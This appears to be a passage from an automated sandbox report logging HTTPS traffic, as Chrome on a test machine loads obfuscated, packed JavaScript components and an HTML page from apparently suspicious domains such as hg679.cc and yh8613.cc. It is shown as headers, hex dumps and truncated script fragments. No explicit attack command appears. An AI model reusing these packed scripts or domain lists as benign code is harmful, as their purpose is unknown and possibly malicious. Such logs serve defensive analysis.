                                                                                                                                                          2024-06-09 22:41:05 UTC2949INData Raw: 2f 20 72 61 74 69 6f 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 61 6e 67 65 2e 62 6f 74 74 6f 6d 20 3d 20 4d 61 74 68 2e 63 65 69 6c 28 28 74 6f 70 20 2b 20 62 74 6e 48 29 20 2f 20 72 61 74 69 6f 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 6e 76 61 73 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 69 67 68 74 20 3d 20 4d 61 74 68 2e 63 65 69 6c 28 63 61 6e 76 61 73 2e 77 69 64 74 68 20 2f 20 32 20 2b 20 62 74 6e 57 20 2f 20 32 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 66 66 73 65 74 58 20 3d 20 65 2e 6f 66 66 73 65 74 58 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f
                                                                                                                                                          Data Ascii: / ratio) range.bottom = Math.ceil((top + btnH) / ratio) canvas.addEventListener('click', function (e) { var right = Math.ceil(canvas.width / 2 + btnW / 2) var offsetX = e.offsetX var o


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          272192.168.2.55002690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:04 UTC554OUTGET /pc/240516-03/static/js/components/367/login.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:05 UTC643INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:05 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 7772
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:20 GMT
                                                                                                                                                          ETag: "6645caac-1e5c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE5[334],EU-GER-frankfurt-GLOBAL1-CACHE4[331,TCP_MISS,332],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 0031c434d8cab6aaff66e0f1360dd622
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1121436
                                                                                                                                                          X-CCDN-Expires: 1470564
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:05 UTC7772INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 4c 41 44 67 45 59 42 64 41 47 67 47 38 77 41 50 41 4e 51 43 59 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 78 46 49 36 6b 30 41 53 6e 49 41 69 46 6b 68 41 41 43 4a 42 77 42 4f 58 54 6d 49 44 63 41 65 54 41 41 72 45 4a 77 42 30 41 45 78 42 4d 75 61 45 41 41 56 35 4b 43 43 48 6b 63 41 6e 70 6b 46 69 41 2b 73 35 42 49 41 73 69 6e 30 73 41 4e 69 44 45 4b 41 44 63 6f 58 78 59 51 42 67 42 43 41 41 59 41 58 32 45 56 45 50 6c 70 4b 41 42 65 4e 45 77 78 41 42 46 39 66 47 41 78 59 56 49 55 64 4e 30 4d 71 45 4b 75 64 4d 7a 6f 6d 41 67 6d 41 74 49 6b 4b 72 45 41 4f 51 42 4e 4b 6a 55 47 2b 56 54 4d 46 45 78 68 54 48 4a 59 30 67 31 74 54 6b 77 6b 58 51 42
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALADgEYBdAGgG8wAPANQCYAuAMwFc0YAXAS3UxFI6k0ASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKADcoXxYQBgBCAAYAX2EVEPlpKABeNEwxABF9fGAxYVIUdN0MqEKudMzomAgmAtIkKrEAOQBNKjUG+VTMFExhTHJY0g1tTkwkXQB


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          273192.168.2.55002890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:04 UTC553OUTGET /pc/240516-03/static/js/components/367/logo.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:05 UTC642INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:05 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2572
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:20 GMT
                                                                                                                                                          ETag: "6645caac-a0c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE9[321],EU-GER-frankfurt-GLOBAL1-CACHE5[310,TCP_MISS,312],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5035c08b8e0aaed472d0b61da2cf5bb2
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1121436
                                                                                                                                                          X-CCDN-Expires: 1470564
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:05 UTC2572INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 4c 41 54 67 41 59 42 64 41 47 67 47 38 42 52 41 53 51 44 63 45 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 77 39 4a 43 6b 6f 41 53 6e 49 41 69 46 6b 68 41 41 43 4a 42 77 42 4f 58 54 6d 49 44 63 41 65 54 41 41 72 45 4a 77 42 30 41 45 78 42 4d 75 61 45 41 41 56 35 4b 43 43 48 6b 63 41 6e 70 6b 46 69 41 2b 73 35 42 49 41 73 69 6e 30 73 41 4e 69 44 45 4b 57 69 68 66 46 68 41 47 41 45 4a 43 41 46 39 68 46 57 44 35 61 52 51 41 58 69 68 4d 4d 55 49 59 43 43 59 78 59 56 49 6b 5a 4d 77 30 6a 4b 34 7a 41 41 74 63 6f 58 53 41 65 6c 6f 41 63 56 78 63 76 4e 39 55 33 54 52 4d 4a 44 79 75 5a 50 49 30 4b 41 42 62 63 4c 46 66 46 41 42 7a 46 45 44 39 4b 41 34
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALATgAYBdAGgG8BRASQDcEAuAMwFc0YAXAS3Uw9JCkoASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKWihfFhAGAEJCAF9hFWD5aRQAXihMMUIYCCYxYVIkZMw0jK4zAAtcoXSAeloAcVxcvN9U3TRMJDyuZPI0KABbcLFfFABzFED9KA4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          274192.168.2.55002790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:04 UTC553OUTGET /pc/240516-03/static/js/components/367/menu.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:05 UTC642INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:05 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2420
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:20 GMT
                                                                                                                                                          ETag: "6645caac-974"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[5],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE2[306],EU-GER-frankfurt-GLOBAL1-CACHE2[305,TCP_MISS,306],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: db47fdf9ab5bda4d7ec08df02db2b7d9
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1121436
                                                                                                                                                          X-CCDN-Expires: 1470564
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:05 UTC2420INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 4c 41 54 67 45 59 42 64 41 47 67 47 38 41 69 41 65 67 45 38 42 52 41 47 55 6f 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 4a 68 36 6b 30 70 45 41 45 6f 71 48 4a 43 41 41 45 53 48 67 43 63 2b 76 53 67 47 34 41 38 6d 41 42 57 49 58 67 44 6f 41 4a 69 44 5a 38 30 49 41 41 71 4b 55 45 45 49 70 36 31 4d 6f 79 67 48 30 58 49 4a 41 46 6b 55 68 6a 67 42 73 51 53 67 6f 41 4e 79 67 2f 44 68 41 57 41 45 49 41 42 67 42 66 63 54 56 51 78 56 6b 6f 41 46 34 51 54 45 6f 59 6d 41 67 32 53 6e 46 53 50 6a 54 79 47 42 51 41 57 77 68 30 45 44 51 65 4a 42 5a 79 63 70 71 4f 41 47 55 4f 4d 48 59 75 58 67 45 30 54 45 6c 46 45 42 34 4f 52 54 52 5a 45 48 31 4d 77 67 42 6d
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALATgEYBdAGgG8AiAegE8BRAGUoC4AzAVzRgBcBLdJh6k0pEAEoqHJCAAESHgCc+vSgG4A8mABWIXgDoAJiDZ80IAAqKUEEIp61MoygH0XIJAFkUhjgBsQSgoANyg/DhAWAEIABgBfcTVQxVkoAF4QTEoYmAg2SnFSPjTyGBQAWwh0EDQeJBZycpqOAGUOMHYuXgE0TElFEB4ORTRZEH1MwgBm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          275192.168.2.55002990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:05 UTC551OUTGET /pc/240516-03/static/js/components/inside.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:05 UTC642INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:05 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1380
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:51 GMT
                                                                                                                                                          ETag: "6645cacb-564"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[6],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,4],EU-GER-frankfurt-GLOBAL1-CACHE5[304],EU-GER-frankfurt-GLOBAL1-CACHE10[300,TCP_MISS,304],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 7bd4bed23ede6006cf456831aa3512b8
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823384
                                                                                                                                                          X-CCDN-Expires: 768616
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:05 UTC1380INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 54 67 45 59 42 64 41 47 67 47 38 41 6c 41 4d 57 6f 47 45 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 78 46 4c 51 42 4b 63 67 46 39 53 41 63 30 49 41 50 4e 4d 7a 61 63 65 61 50 67 4e 49 64 68 41 49 68 5a 49 51 41 41 69 51 63 41 54 6c 30 37 71 41 33 41 48 6b 77 41 4b 78 43 63 41 64 41 42 4d 51 54 4c 6d 68 41 41 46 41 79 67 67 67 44 48 41 4a 36 59 61 4b 54 71 41 50 71 68 49 45 67 41 73 69 67 4f 4c 41 41 32 49 4f 6f 55 41 47 35 51 38 53 77 67 44 41 43 45 41 41 77 69 67 71 5a 70 42 6a 70 63 41 4c 77 63 6d 4f 71 35 4d 42 42 4d 36 6f 4b 6b 53 47 58 6b 61 46 41 41 74 6c 6e 71 72 6b 68 63 54 73 6b 51 58 68 42 49 44 4e 6a 71 33 4a 30 47 36 6d 51
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgEYBdAGgG8AlAMWoGEAuAMwFc0YAXAS3UxFLQBKcgF9SAc0IAPNMzaceaPgNIdhAIhZIQAAiQcATl07qA3AHkwAKxCcAdABMQTLmhAAFAygggDHAJ6YaKTqAPqhIEgAsigOLAA2IOoUAG5Q8SwgDACEAAwigqZpBjpcALwcmOq5MBBM6oKkSGXkaFAAtlnqrkhcTskQXhBIDNjq3J0G6mQ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          276192.168.2.55003090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:05 UTC558OUTGET /pc/240516-03/static/js/components/367/footerNav.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:05 UTC644INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:05 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2012
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:20 GMT
                                                                                                                                                          ETag: "6645caac-7dc"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[20],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,17],EU-GER-frankfurt-GLOBAL1-CACHE9[295],EU-GER-frankfurt-GLOBAL1-CACHE1[292,TCP_MISS,295],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: e4b850769433fd1826d037161f13e473
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1121436
                                                                                                                                                          X-CCDN-Expires: 1470564
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:05 UTC2012INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 4c 41 44 67 45 34 42 64 41 47 67 47 38 6f 30 42 32 51 67 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4d 33 53 55 42 4b 63 67 46 39 53 41 49 67 42 65 41 61 51 44 55 30 30 59 78 62 73 75 61 48 6e 31 49 64 42 6f 70 6b 68 41 41 43 4a 47 77 42 4f 48 64 71 49 44 63 41 65 54 41 41 72 45 4f 77 42 30 41 45 78 41 4d 4f 61 45 41 41 56 44 4b 43 43 45 4e 73 41 54 30 77 55 4d 51 42 39 55 4a 41 6b 41 46 6b 55 52 79 59 41 47 78 42 52 43 67 41 33 4b 48 69 6d 45 44 6f 41 51 67 41 47 49 58 34 7a 4e 4d 4e 64 45 41 42 65 44 6b 78 52 58 4a 67 49 42 6c 46 2b 55 6a 51 79 38 6b 63 6f 4e 69 67 46 56 6b 35 75 51 55 4d 51 4e 69 5a 44 4e 48 49 4f 41 46 73 41 63 7a 70 52 5a
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALADgE4BdAGgG8o0B2QgLgDMBXNGAFwEt1M3SUBKcgF9SAIgBeAaQDU00YxbsuaHn1IdBopkhAACJGwBOHdqIDcAeTAArEOwB0AExAMOaEAAVDKCCENsAT0wUMQB9UJAkAFkURyYAGxBRCgA3KHimEDoAQgAGIX4zNMNdEABeDkxRXJgIBlF+UjQy8kcoNigFVk5uQUMQNiZDNHIOAFsAczpRZ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          277192.168.2.550031202.61.87.2194434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:05 UTC699OUTGET /default.html HTTP/1.1
                                                                                                                                                          Host: yh8613.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: com_env=p
                                                                                                                                                          2024-06-09 22:41:06 UTC404INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:05 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 35313
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Last-Modified: Fri, 18 Aug 2023 04:30:01 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          ETag: "64def3c9-89f1"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:06 UTC15980INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 2e 69 6e 69 74 2d 69 70 2d 62 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 74 6f 70 3a 20 30 3b 6c 65 66 74 3a 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head> <meta charset=utf-8> <meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"> <title></title> <style> .init-ip-block{position: fixed;top: 0;left: 0;background-color
                                                                                                                                                          2024-06-09 22:41:06 UTC16384INData Raw: 20 20 22 77 73 73 61 2d 33 36 31 2e 69 78 69 61 6f 73 68 69 7a 69 2e 63 6f 6d 3a 31 37 38 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 77 73 73 61 2d 33 35 31 2e 74 61 69 6a 75 65 74 61 69 71 75 61 6e 64 61 6f 2e 63 6f 6d 3a 31 36 38 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 31 39 36 32 2e 77 77 77 62 79 66 65 6e 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 31 39 36 32 2e 68 79 64 71 65 66 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 2d 61 77 73 2e 62 61 6b 65 64 64 6f 76 65 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 2d 61 6b 61 2e 62 6c 61 63 6b 6b 68 61 6b 69 39 31 38 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20
                                                                                                                                                          Data Ascii: "wssa-361.ixiaoshizi.com:1785", "wssa-351.taijuetaiquandao.com:1685", "ocsapi1962.wwwbyfen.com", "ocsapi1962.hydqef.com", "ocsapi-aws.bakeddove.com", "ocsapi-aka.blackkhaki918.com",
                                                                                                                                                          2024-06-09 22:41:06 UTC2949INData Raw: 2f 20 72 61 74 69 6f 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 61 6e 67 65 2e 62 6f 74 74 6f 6d 20 3d 20 4d 61 74 68 2e 63 65 69 6c 28 28 74 6f 70 20 2b 20 62 74 6e 48 29 20 2f 20 72 61 74 69 6f 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 6e 76 61 73 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 69 67 68 74 20 3d 20 4d 61 74 68 2e 63 65 69 6c 28 63 61 6e 76 61 73 2e 77 69 64 74 68 20 2f 20 32 20 2b 20 62 74 6e 57 20 2f 20 32 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 66 66 73 65 74 58 20 3d 20 65 2e 6f 66 66 73 65 74 58 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f
                                                                                                                                                          Data Ascii: / ratio) range.bottom = Math.ceil((top + btnH) / ratio) canvas.addEventListener('click', function (e) { var right = Math.ceil(canvas.width / 2 + btnW / 2) var offsetX = e.offsetX var o


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          278192.168.2.55003390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:05 UTC552OUTGET /pc/240516-03/static/js/components/wrapper.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
